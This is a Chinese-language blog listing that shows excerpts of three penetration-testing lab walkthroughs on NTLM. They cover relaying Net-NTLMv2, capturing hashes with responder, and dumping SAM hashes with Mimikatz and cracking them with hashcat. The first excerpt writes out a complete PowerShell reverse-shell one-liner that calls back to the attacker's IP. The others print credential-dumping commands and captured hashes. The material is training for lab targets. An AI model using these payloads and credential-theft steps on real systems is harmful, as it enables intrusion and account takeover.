發表文章

目前顯示的是有「NTLMv2」標籤的文章

中繼(Relaying) Net-NTLMv2

圖片
 中繼(Relaying) Net-NTLMv2 靶機群組 #1 : 192.168.197.211、#2 : 192.168.197.212,已知帳號 files02admin 攻擊機 IP : 192.168.45.228 Relaying 中繼的意思就是收到後轉發到攻擊目標所以稱為 relay 還記得前面學過得先將 powershell 建立 reverse shell 的指令做出來如下 在 kali 開啟 powershell 編輯器 --> 輸入 pwsh 將整個 one-liner 轉成變數 $Text,如下的 PowerShell one-liner 要連到本機(192.168.45.228)建立的 4444 Port Listen PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.228",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' 將 $Text 先做 Encoding 轉成 $Bytes $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 再轉 Base64 $En...

NET-NTLMv2 密碼破解

圖片
 NET-NTLMv2 密碼破解 靶機 IP : 192.168.197.211 第一步 rustscan,└─$ rustscan -a 192.168.197.211 --scripts none --ulimit 500 135、139、445、3389、4444、5555、5985、47001、etc... nmap 列舉這幾個 Port,└─$ sudo nmap -sV -sC -p 135,139,445,3389,4444,5555,5985 192.168.197.211 上圖可以看到有一個 4444 Port 是 krb524,透過 nc 直接連接時發現可以直接拿到 shell 這是因為有一個假設的前提,前提是我們已經有透過 paul 帳號初步滲透並在對方的 4444 Port 上綁定了 Remote Shell,所以此時才能直接使用 nc 進行 remote shell 連接 執行 ipconfig 確認是該台機器的 shell,whoami 查看使用者是 paul 透過 net user paul 查看使用者的進一步資訊,僅隸屬於遠端桌面群組 在我們的攻擊機上執行 ip a 查看相關 Interface 介面與資訊,我們需要的是 tun0 這個介面 192.168.45.228 是我們攻擊機的與靶機有路由的介面 IP 執行 └─$ sudo responder -I tun0,於介面 tun0 上啟動 responder 監聽,接下來主要要透過 SMB 這個服務來監聽所有傳入的驗證,確認 SMB 服務在 responder 是 ON 的狀態 接下來從剛剛的 remote shell 執行 dir \\192.168.45.228\test,可以看到存取失敗 在 responder 服務上可以看到從靶機傳過來的驗證,使用者是 FILES01\paul,密碼是雜湊如下 paul::FILES01:f9d057cea7136add:883BA6449490AD7910962CEDAF7DA112:01010000000000008017673550EBD901F4031B80844971500000000002000800310050003500500001001E00570049004E002D00370037005A0044003500...

NTLM 密碼破解

圖片
 NTLM 密碼破解 Windows 將使用者密碼雜湊儲存在安全帳戶管理員 SAM 資料庫檔案中 核心對該檔案保持獨佔檔案系統鎖定 路徑位於 C:\Windows\system32\config\sam 靶機 IP : 192.168.197.210,獲取 nelly 用戶桌面上的 Flag 已知一般使用者帳號密碼 : offsec / lab 第一步 xfreerdp 登入遠端主機並掛載磁碟機 └─$ xfreerdp -v:192.168.197.210 -u:offsec -p:lab -drive:aries,/home/kali_r/Templates 登入後先查看 local 使用者,使用指令 Get-LocalUser 下圖有列出來題目要我們查找的 nelly 使用者,後續就是直接破解該帳號密碼 透過管理員身份啟動 PowerShell,然後啟動 Mimikatz 開始提取密碼,分別輸入以下指令 (每個指令由一個模組和兩個冒號分隔的指令組成)  - privilege::debug  - token::elevate  - lsadump::sam 下面可以看到我們想要的使用者 nelly 的 hash 了,主要要的是這一段 Hash NTLM: 3ae8e5f0ffabb3a627672e1600f1ba10 先建立一個檔案 nelly.hash 並將 HASH 內容貼上 透過指令 └─$ hashcat --help | grep -i "ntlm" 查一下 NTLM 的 mode,是 1000 直接 hashcat 下去破解密碼吧,帶入 rockyou.txt 與 best64 規則來變異密碼表 └─$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 答案很快就出來了是 nicole1 RDP 進去看看 └─$ xfreerdp -v:192.168.197.210 -u:nelly -p:nicole1 登入後拿到目標 Flag 了 靶機 2 : 192.168.197.227 已知使用者 n...